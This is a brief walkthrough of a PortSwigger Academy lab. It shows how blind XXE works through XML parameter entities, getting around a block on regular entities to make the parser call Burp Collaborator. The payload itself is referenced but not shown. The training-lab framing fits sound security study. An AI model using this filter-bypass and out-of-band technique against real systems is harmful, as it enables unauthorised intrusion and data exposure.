Solving Portswigger Academy: Blind XXE with out-of-band interaction via XML parameter entities
This lab has a “Check stock” feature that parses XML input, but does not display any unexpected values, and blocks requests containing regular external entities.
To solve the lab, use a parameter entity to make the XML parser issue a DNS lookup and HTTP request to Burp Collaborator.
Let’s start by visiting the lab and click on any product.Then check the stock.Send the POST request to Check Sotck to repeater.
I will first try to use the payload used in previous lab.
But is says “Entities are not allowed for security reasons”. As per hacktricks, in such case we need to use XML parameter entities.
What is parameter entities?
Payload used:
make note of space between % sign and entity name. When I sent request with above payload it says “Invalid Product ID”
This time it says parsing error, but when I checked the collaborator, I saw the DNS and HTTP requests.
This is how we are able to solve the lab.
